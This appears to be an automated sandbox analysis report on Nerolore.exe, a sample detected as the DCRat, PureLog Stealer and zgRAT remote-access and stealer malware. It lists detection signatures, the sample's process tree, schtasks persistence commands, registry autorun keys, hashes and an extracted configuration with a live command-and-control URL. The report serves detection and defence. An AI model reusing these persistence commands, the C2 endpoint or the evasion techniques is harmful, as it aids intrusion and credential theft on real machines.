Windows Analysis Report
Nerolore.exe

Overview

General Information

Sample name: Nerolore.exe
Analysis ID: 1498674
MD5: 173524b924df7f85fc534a492707f643
SHA1: 44362f40b387610d723ba6090ffacf5a17f98bd3
SHA256: 9559e225f13920d3f18a77d324a732447c67b85073af3044237d51eefdbec0a2
Tags: exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Nerolore.exe (PID: 2640 cmdline: "C:\Users\user\Desktop\Nerolore.exe" MD5: 173524B924DF7F85FC534A492707F643)
    • wscript.exe (PID: 6512 cmdline: "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 4408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\FontHost\jaBrEDg4l5LU3rdwo0YF4dXFHSglnc1NMMTuA.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ContainerAgentWinSession.exe (PID: 5344 cmdline: "C:\FontHost/ContainerAgentWinSession.exe" MD5: 03EF05FF3B0C058220324C2CE72950F2)
          • schtasks.exe (PID: 6976 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1772 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6056 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 6752 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 1164 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C21.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8B039BDD94094F1C8481C1D931E1DDC9.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 3772 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 6968 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E35.tmp" "c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 2636 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 11 /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6132 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2020 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 10 /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6304 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\dbg\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2408 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\dbg\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3924 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\dbg\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5952 cmdline: schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4072 cmdline: schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6208 cmdline: schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1524 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1276 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6488 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2636 cmdline: schtasks.exe /create /tn "ContainerAgentWinSessionC" /sc MINUTE /mo 5 /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2108 cmdline: schtasks.exe /create /tn "ContainerAgentWinSession" /sc ONLOGON /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3836 cmdline: schtasks.exe /create /tn "ContainerAgentWinSessionC" /sc MINUTE /mo 9 /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 3652 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 828 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 2636 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • conhost.exe (PID: 7260 cmdline: "C:\Users\All Users\dbg\conhost.exe" MD5: 03EF05FF3B0C058220324C2CE72950F2)
  • conhost.exe (PID: 5424 cmdline: "C:\Users\All Users\dbg\conhost.exe" MD5: 03EF05FF3B0C058220324C2CE72950F2)
  • conhost.exe (PID: 5632 cmdline: "C:\Users\All Users\dbg\conhost.exe" MD5: 03EF05FF3B0C058220324C2CE72950F2)
  • NjWYKcLujkVoPzemFBeg.exe (PID: 6968 cmdline: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe MD5: 03EF05FF3B0C058220324C2CE72950F2)
  • NjWYKcLujkVoPzemFBeg.exe (PID: 5664 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe" MD5: 03EF05FF3B0C058220324C2CE72950F2)
  • NjWYKcLujkVoPzemFBeg.exe (PID: 7380 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe" MD5: 03EF05FF3B0C058220324C2CE72950F2)
  • cleanup
{"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-2HbjMANWKVWdushT6pWo", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
Nerolore.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
Nerolore.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\ProgramData\dbg\conhost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\ProgramData\dbg\conhost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\FontHost\NjWYKcLujkVoPzemFBeg.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000005.00000000.2222651523.0000000000A42000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000005.00000002.2282828928.0000000013347000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: ContainerAgentWinSession.exe PID: 5344 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
5.0.ContainerAgentWinSession.exe.a40000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
5.0.ContainerAgentWinSession.exe.a40000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\FontHost\ContainerAgentWinSession.exe, ProcessId: 5344, TargetFilename: C:\Users\All Users\dbg\conhost.exe
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: "C:\Users\Default\Templates\OfficeClickToRun.exe", EventID: 13, EventType: SetValue, Image: C:\FontHost\ContainerAgentWinSession.exe, ProcessId: 5344, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Users\All Users\dbg\conhost.exe", CommandLine: "C:\Users\All Users\dbg\conhost.exe", CommandLine|base64offset|contains: , Image: C:\ProgramData\dbg\conhost.exe, NewProcessName: C:\ProgramData\dbg\conhost.exe, OriginalFileName: C:\ProgramData\dbg\conhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Users\All Users\dbg\conhost.exe", ProcessId: 5424, ProcessName: conhost.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe", EventID: 13, EventType: SetValue, Image: C:\FontHost\ContainerAgentWinSession.exe, ProcessId: 5344, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NjWYKcLujkVoPzemFBeg
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: explorer.exe, "C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe", EventID: 13, EventType: SetValue, Image: C:\FontHost\ContainerAgentWinSession.exe, ProcessId: 5344, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\FontHost/ContainerAgentWinSession.exe", ParentImage: C:\FontHost\ContainerAgentWinSession.exe, ParentProcessId: 5344, ParentProcessName: ContainerAgentWinSession.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline", ProcessId: 6752, ProcessName: csc.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Nerolore.exe", ParentImage: C:\Users\user\Desktop\Nerolore.exe, ParentProcessId: 2640, ParentProcessName: Nerolore.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe" , ProcessId: 6512, ProcessName: wscript.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\FontHost\ContainerAgentWinSession.exe, ProcessId: 5344, TargetFilename: C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\FontHost/ContainerAgentWinSession.exe", ParentImage: C:\FontHost\ContainerAgentWinSession.exe, ParentProcessId: 5344, ParentProcessName: ContainerAgentWinSession.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline", ProcessId: 6752, ProcessName: csc.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\dbg\conhost.exe'" /f, CommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\dbg\conhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\FontHost/ContainerAgentWinSession.exe", ParentImage: C:\FontHost\ContainerAgentWinSession.exe, ParentProcessId: 5344, ParentProcessName: ContainerAgentWinSession.exe, ProcessCommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\dbg\conhost.exe'" /f, ProcessId: 6304, ProcessName: schtasks.exe
Timestamp: 2024-08-25T15:43:29.322612+0200
SID: 2048095
Severity: 1
Source Port: 49712
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: Nerolore.exe; Avira: detected
Source: http://373292cm.nyashka.top; Avira URL Cloud: Label: malware
Source: http://373292cm.nyashka.top/; Avira URL Cloud: Label: malware
Source: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php; Avira URL Cloud: Label: malware
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe; Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\XwBnJZqg.log; Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\GeIICmFp.log; Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\dbg\conhost.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\ONhXawky.log; Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\xvosSKAI.log; Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat; Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\FontHost\ContainerAgentWinSession.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000005.00000002.2282828928.0000000013347000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: DCRat {"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-2HbjMANWKVWdushT6pWo", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: 373292cm.nyashka.top; Virustotal: Detection: 18%
Source: http://373292cm.nyashka.top/; Virustotal: Detection: 18%
Source: http://373292cm.nyashka.top; Virustotal: Detection: 18%
Source: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php; Virustotal: Detection: 17%
Source: C:\FontHost\ContainerAgentWinSession.exe; ReversingLabs: Detection: 65%
Source: C:\FontHost\ContainerAgentWinSession.exe; Virustotal: Detection: 54%
Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe; ReversingLabs: Detection: 65%
Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe; Virustotal: Detection: 54%
Source: C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe; ReversingLabs: Detection: 65%
Source: C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe; Virustotal: Detection: 54%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe; ReversingLabs: Detection: 65%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe; Virustotal: Detection: 54%
Source: C:\ProgramData\dbg\conhost.exe; ReversingLabs: Detection: 65%
Source: C:\ProgramData\dbg\conhost.exe; Virustotal: Detection: 54%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe; ReversingLabs: Detection: 65%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe; Virustotal: Detection: 54%
Source: C:\Users\user\Desktop\EeOHqUfQ.log; ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\EeOHqUfQ.log; Virustotal: Detection: 27%
Source: C:\Users\user\Desktop\EmyZUDGW.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\EmyZUDGW.log; Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\GeIICmFp.log; ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\GeIICmFp.log; Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\LtUgLbtj.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\LtUgLbtj.log; Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\ONhXawky.log; Virustotal: Detection: 21%
Source: C:\Users\user\Desktop\XwBnJZqg.log; ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\XwBnJZqg.log; Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\ddCMyFqs.log; Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\goYNyXVt.log; ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\goYNyXVt.log; Virustotal: Detection: 27%
Source: C:\Users\user\Desktop\vBGRGbPj.log; Virustotal: Detection: 10%
Source: Nerolore.exe; ReversingLabs: Detection: 78%
Source: Nerolore.exe; Virustotal: Detection: 66%
Source: Submited Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe; Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\XwBnJZqg.log; Joe Sandbox ML: detected
Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GeIICmFp.log; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe; Joe Sandbox ML: detected
Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe; Joe Sandbox ML: detected
Source: C:\ProgramData\dbg\conhost.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\vBGRGbPj.log; Joe Sandbox ML: detected
Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ddCMyFqs.log; Joe Sandbox ML: detected
Source: C:\FontHost\ContainerAgentWinSession.exe; Joe Sandbox ML: detected
Source: Nerolore.exe; Joe Sandbox ML: detected
Source: Nerolore.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\FontHost\ContainerAgentWinSession.exe; Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe
Source: C:\FontHost\ContainerAgentWinSession.exe; Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\54f8e4f5b93f5a
Source: C:\FontHost\ContainerAgentWinSession.exe; Directory created: C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe
Source: C:\FontHost\ContainerAgentWinSession.exe; Directory created: C:\Program Files\7-Zip\Lang\54f8e4f5b93f5a
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Nerolore.exe, Nerolore.exe, 00000000.00000002.2093071531.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.pdb source: ContainerAgentWinSession.exe, 00000005.00000002.2279169937.0000000003642000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.pdb source: ContainerAgentWinSession.exe, 00000005.00000002.2279169937.0000000003642000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\FontHost\ContainerAgentWinSession.exe; File opened: C:\Users\user\Documents\desktop.ini
Source: C:\FontHost\ContainerAgentWinSession.exe; File opened: C:\Users\user
Source: C:\FontHost\ContainerAgentWinSession.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\FontHost\ContainerAgentWinSession.exe; File opened: C:\Users\user\AppData
Source: C:\FontHost\ContainerAgentWinSession.exe; File opened: C:\Users\user\AppData\Local
Source: C:\FontHost\ContainerAgentWinSession.exe; File opened: C:\Users\user\Desktop\desktop.ini

Networking

